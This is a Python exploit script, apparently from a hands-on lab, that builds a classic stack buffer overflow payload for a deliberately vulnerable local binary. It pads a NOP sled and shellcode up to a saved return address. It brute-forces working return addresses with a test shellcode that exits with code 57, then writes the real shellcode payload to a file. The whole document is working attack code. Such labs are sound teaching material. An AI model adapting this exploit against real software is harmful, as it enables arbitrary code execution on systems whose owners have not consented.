#!/usr/bin/env python3
import struct
import subprocess as sp





# You'll probably need to adjust `RIP_OFFSET` and `ADDR`.





################################################################
### CONFIGURATION ##############################################

# size of the read buffer itself
BUFFER_SIZE = 1024

# offset between start of the buffer and RIP for the last
#  stack frame (this is what we are trying to overwrite)
# this is BUFFER_SIZE + EBP (unless optimized out) + possibly some stack variables
RIP_OFFSET = 1036

# address that we try to jump to - this doesn't have to be exact thanks to
#  the NOP sled we add to the payload; this one works well on my machine
ADDR = 0xffffcc58 # 32 bit
# address size in bytes
ADDR_SIZE = 4

# how large range around ADDR to test (<ADDR - ADDR_RANGE, ADDR + ADDR_RANGE>)
ADDR_RANGE = 0x4000

SHELLCODE_PATH = "./out/shellcode_x86"

################################################################
################################################################


def wrap_shellcode(shellcode):
	# buffer layout will be:
	#   8 illegal instructions (makes the detection more robust for cases where stack data just before the buffer are valid instructions)
	#   NOP sled (better chance of hitting the shellcode)
	#   shellcode
	#   followed by padding to get to RIP
	prefix = b'\x17' * 8 + b'\x90' * (BUFFER_SIZE - 8 - len(shellcode))
	suffix = b'\x00' * (RIP_OFFSET - BUFFER_SIZE)
	return prefix + shellcode + suffix

def get_payload(shellcode, ret_addr):
	if ADDR_SIZE == 8:
		format_str = "=Q"
	elif ADDR_SIZE == 4:
		format_str = "=I"
	else:
		raise Exception("Unsupported address size: {} bytes".format(ADDR_SIZE))
	return wrap_shellcode(shellcode) + struct.pack(format_str, ret_addr) + b"\n"

def test_payload(payload):
	return sp.run(["./out/exploitable", "--norick"], input=payload, stdout=sp.DEVNULL)


# exit_57 is a small shellcode that just attempts to exit with code 57
# we use it to test if the buffer size and address are working
with open("./out/exit_57", "rb") as fd:
	shellcode = fd.read()

working_addresses = []
# crop max tested address to the highest possible address
max_addr = min(ADDR + ADDR_RANGE, (1 << (ADDR_SIZE * 8)) - 1)
print("Testing addresses between '0x{:x}' and '0x{:x}'.".format(ADDR - ADDR_RANGE, max_addr))
# brute-force through a range of RIP addresses to find the ones in our buffer
for addr in range(ADDR - ADDR_RANGE, max_addr, BUFFER_SIZE // 4):
	if test_payload(get_payload(shellcode, addr)).returncode == 57:
		working_addresses.append(addr)

if len(working_addresses) == 0:
	raise Exception("Either the buffer address, range or size, or the EIP/RIP offset are not correct")

print("Found working addresses:", ", ".join("0x" + hex(a) for a in working_addresses))
# take the middle address, to leave as much room as possible for env variation
addr = working_addresses[(len(working_addresses) - 1) // 2]
print("Using 0x" + hex(addr) + ".")


# construct and write real payload
with open(SHELLCODE_PATH, "rb") as fd:
	shellcode = fd.read()
with open("./out/payload.bin", "wb") as fd:
	fd.write(get_payload(shellcode, addr))

print("Payload written to './out/payload.bin'.")